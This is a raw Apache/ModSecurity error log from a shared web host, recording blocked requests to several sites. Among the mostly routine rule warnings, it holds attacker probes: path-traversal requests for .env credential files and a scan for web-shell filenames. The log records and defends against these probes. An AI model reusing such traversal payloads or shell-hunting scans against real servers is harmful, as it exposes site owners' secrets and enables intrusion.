[Tue May 12 03:36:50.937805 2026] [security2:error] [pid 1730175:tid 1730201] [client 172.104.186.23:49662] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/docs"] [unique_id "agKEMno6NvB9WXx5V-6IYQAAARg"]
[Tue May 12 03:36:50.938029 2026] [security2:error] [pid 1730175:tid 1730201] [client 172.104.186.23:49662] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/docs"] [unique_id "agKEMno6NvB9WXx5V-6IYQAAARg"]
[Tue May 12 03:36:51.544888 2026] [security2:error] [pid 1730175:tid 1730201] [client 172.104.186.23:49662] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKEMno6NvB9WXx5V-6IYQAAARg"]
[Tue May 12 03:36:55.385403 2026] [security2:error] [pid 1730175:tid 1730201] [client 172.104.186.23:49662] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/files"] [unique_id "agKEN3o6NvB9WXx5V-6IYwAAARg"]
[Tue May 12 03:36:55.385611 2026] [security2:error] [pid 1730175:tid 1730201] [client 172.104.186.23:49662] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/files"] [unique_id "agKEN3o6NvB9WXx5V-6IYwAAARg"]
[Tue May 12 03:36:55.676252 2026] [security2:error] [pid 1730207:tid 1730217] [client 176.65.139.239:34634] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "k06.fr"] [uri "/app/.env"] [unique_id "agKENzue9Sp-pIv_Bb6eKQAAAUg"]
[Tue May 12 03:36:55.676484 2026] [security2:error] [pid 1730207:tid 1730217] [client 176.65.139.239:34634] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "k06.fr"] [uri "/app/.env"] [unique_id "agKENzue9Sp-pIv_Bb6eKQAAAUg"]
[Tue May 12 03:36:55.676730 2026] [security2:error] [pid 1730207:tid 1730217] [client 176.65.139.239:34634] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "k06.fr"] [uri "/app/.env"] [unique_id "agKENzue9Sp-pIv_Bb6eKQAAAUg"]
[Tue May 12 03:36:56.559954 2026] [security2:error] [pid 1730175:tid 1730201] [client 172.104.186.23:49662] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKEN3o6NvB9WXx5V-6IYwAAARg"]
[Tue May 12 03:36:56.929618 2026] [security2:error] [pid 1730175:tid 1730201] [client 172.104.186.23:49662] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/images"] [unique_id "agKEOHo6NvB9WXx5V-6IZAAAARg"]
[Tue May 12 03:36:56.929815 2026] [security2:error] [pid 1730175:tid 1730201] [client 172.104.186.23:49662] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/images"] [unique_id "agKEOHo6NvB9WXx5V-6IZAAAARg"]
[Tue May 12 03:36:57.239902 2026] [:error] [pid 1709071:tid 1709087] [client 179.9.173.131:54043] File does not exist: /home/ixinabou/public_html/xmlrpc.php
[Tue May 12 03:36:57.503109 2026] [security2:error] [pid 1730175:tid 1730201] [client 172.104.186.23:49662] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKEOHo6NvB9WXx5V-6IZAAAARg"]
[Tue May 12 03:36:58.705909 2026] [security2:error] [pid 1730175:tid 1730201] [client 172.104.186.23:49662] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/img"] [unique_id "agKEOno6NvB9WXx5V-6IZQAAARg"]
[Tue May 12 03:36:58.706121 2026] [security2:error] [pid 1730175:tid 1730201] [client 172.104.186.23:49662] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/img"] [unique_id "agKEOno6NvB9WXx5V-6IZQAAARg"]
[Tue May 12 03:36:59.309951 2026] [security2:error] [pid 1730175:tid 1730201] [client 172.104.186.23:49662] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKEOno6NvB9WXx5V-6IZQAAARg"]
[Tue May 12 03:37:01.506126 2026] [security2:error] [pid 1695975:tid 1695999] [client 146.56.197.150:35476] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "nearoo.fr"] [uri "/"] [unique_id "agKEPdVI9ymHBxup74-ZTAAAAJU"]
[Tue May 12 03:37:02.116675 2026] [security2:error] [pid 1730175:tid 1730201] [client 172.104.186.23:49662] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/assets"] [unique_id "agKEPno6NvB9WXx5V-6IZwAAARg"]
[Tue May 12 03:37:02.116877 2026] [security2:error] [pid 1730175:tid 1730201] [client 172.104.186.23:49662] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/assets"] [unique_id "agKEPno6NvB9WXx5V-6IZwAAARg"]
[Tue May 12 03:37:02.762827 2026] [security2:error] [pid 1730175:tid 1730201] [client 172.104.186.23:49662] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKEPno6NvB9WXx5V-6IZwAAARg"]
[Tue May 12 03:37:05.840935 2026] [security2:error] [pid 1730175:tid 1730178] [client 43.163.5.216:57432] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agKEQXo6NvB9WXx5V-6IaAAAAQE"]
[Tue May 12 03:37:11.467637 2026] [core:error] [pid 1691274:tid 1691298] [client 45.148.10.119:22020] AH10244: invalid URI path (/storage/../../../.env)
[Tue May 12 03:37:11.469085 2026] [core:error] [pid 1730207:tid 1730230] [client 45.148.10.119:21914] AH10244: invalid URI path (/../.env)
[Tue May 12 03:37:11.614391 2026] [core:error] [pid 1730175:tid 1730180] [client 45.148.10.119:22084] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 03:37:27.770687 2026] [security2:error] [pid 1730175:tid 1730185] [client 172.104.186.23:48610] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/media"] [unique_id "agKEV3o6NvB9WXx5V-6IuQAAAQg"]
[Tue May 12 03:37:27.770886 2026] [security2:error] [pid 1730175:tid 1730185] [client 172.104.186.23:48610] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/media"] [unique_id "agKEV3o6NvB9WXx5V-6IuQAAAQg"]
[Tue May 12 03:37:28.372788 2026] [security2:error] [pid 1730175:tid 1730185] [client 172.104.186.23:48610] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKEV3o6NvB9WXx5V-6IuQAAAQg"]
[Tue May 12 03:37:31.063102 2026] [autoindex:error] [pid 1695975:tid 1695993] [client 85.203.21.120:45261] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/languages/loco/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:37:31.957271 2026] [autoindex:error] [pid 1709071:tid 1709109] [client 85.203.21.137:22555] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/languages/loco/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-content/languages/loco/
[Tue May 12 03:37:48.874689 2026] [:error] [pid 1695975:tid 1695983] [client 137.184.226.250:52840] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 03:38:11.802117 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/hhf.php
[Tue May 12 03:38:12.009008 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/amba5.php
[Tue May 12 03:38:12.212137 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/fvvff.php
[Tue May 12 03:38:12.414974 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/about.php
[Tue May 12 03:38:12.985014 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/tfm.php
[Tue May 12 03:38:13.188138 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/wp-good.php
[Tue May 12 03:38:13.400688 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/ioxi-o.php
[Tue May 12 03:38:13.603982 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/edit.php
[Tue May 12 03:38:13.807415 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/inputs.php
[Tue May 12 03:38:14.023546 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/a7.php
[Tue May 12 03:38:14.228886 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/ms-edit.php
[Tue May 12 03:38:14.439973 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/insta.php
[Tue May 12 03:38:14.778383 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/t.php
[Tue May 12 03:38:14.981344 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/s.php
[Tue May 12 03:38:15.184208 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/CDX6.php
[Tue May 12 03:38:15.393481 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/100.php
[Tue May 12 03:38:15.596289 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/0x.php
[Tue May 12 03:38:15.800772 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/abc.php
[Tue May 12 03:38:16.023092 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/drykl.php
[Tue May 12 03:38:16.244126 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/term.php
[Tue May 12 03:38:16.614326 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/155.php
[Tue May 12 03:38:16.818226 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/bolt.php
[Tue May 12 03:38:17.079626 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/koiy.php
[Tue May 12 03:38:17.289358 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/amp.php
[Tue May 12 03:38:17.492546 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/solo1.php
[Tue May 12 03:38:17.697218 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/8.php
[Tue May 12 03:38:17.901978 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/jp.php
[Tue May 12 03:38:18.104959 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/jga.php
[Tue May 12 03:38:18.308050 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/gelio1.php
[Tue May 12 03:38:18.788255 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/222.php
[Tue May 12 03:38:18.994050 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/666.php
[Tue May 12 03:38:19.218251 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/166.php
[Tue May 12 03:38:19.421528 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/classwithtostring.php
[Tue May 12 03:38:19.628750 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/tool.php
[Tue May 12 03:38:19.842391 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/file61.php
[Tue May 12 03:38:20.183923 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/atomlib.php
[Tue May 12 03:38:20.402335 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/elp.php
[Tue May 12 03:38:20.605762 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/wp-blog-header.php
[Tue May 12 03:38:20.825088 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/gk.php
[Tue May 12 03:38:21.028244 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/wen.php
[Tue May 12 03:38:21.231751 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/cilus.php
[Tue May 12 03:38:21.443111 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/wp-p2r3q9c8k4.php
[Tue May 12 03:38:21.648039 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/tires.php
[Tue May 12 03:38:21.861027 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/wp9.php
[Tue May 12 03:38:22.150490 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/xltt.php
[Tue May 12 03:38:22.358813 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/menu.php
[Tue May 12 03:38:22.576753 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/1.php
[Tue May 12 03:38:22.779719 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/wp-access.php
[Tue May 12 03:38:22.990761 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/wp-png.php
[Tue May 12 03:38:23.396937 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/144.php
[Tue May 12 03:38:23.803372 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/asasx.php
[Tue May 12 03:38:24.007476 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/asd.php
[Tue May 12 03:38:24.221356 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/ws75.php
[Tue May 12 03:38:24.424450 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/academy.php
[Tue May 12 03:38:24.671872 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/ws86.php
[Tue May 12 03:38:24.876293 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/b.php
[Tue May 12 03:38:25.084380 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/amax.php
[Tue May 12 03:38:25.302394 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/as.php
[Tue May 12 03:38:25.505672 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/xa.php
[Tue May 12 03:38:25.873228 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/kj.php
[Tue May 12 03:38:26.168141 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/gettest.php
[Tue May 12 03:38:26.387145 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/fff.php
[Tue May 12 03:38:26.590877 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/ortasekerli1.php
[Tue May 12 03:38:26.898247 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/gifclass.php
[Tue May 12 03:38:27.324612 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/motu.php
[Tue May 12 03:38:27.539737 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/Sanskrit.php
[Tue May 12 03:38:27.934964 2026] [:error] [pid 1709071:tid 1709089] [client 20.226.81.141:36102] File does not exist: /home/naturede/public_html/green.php
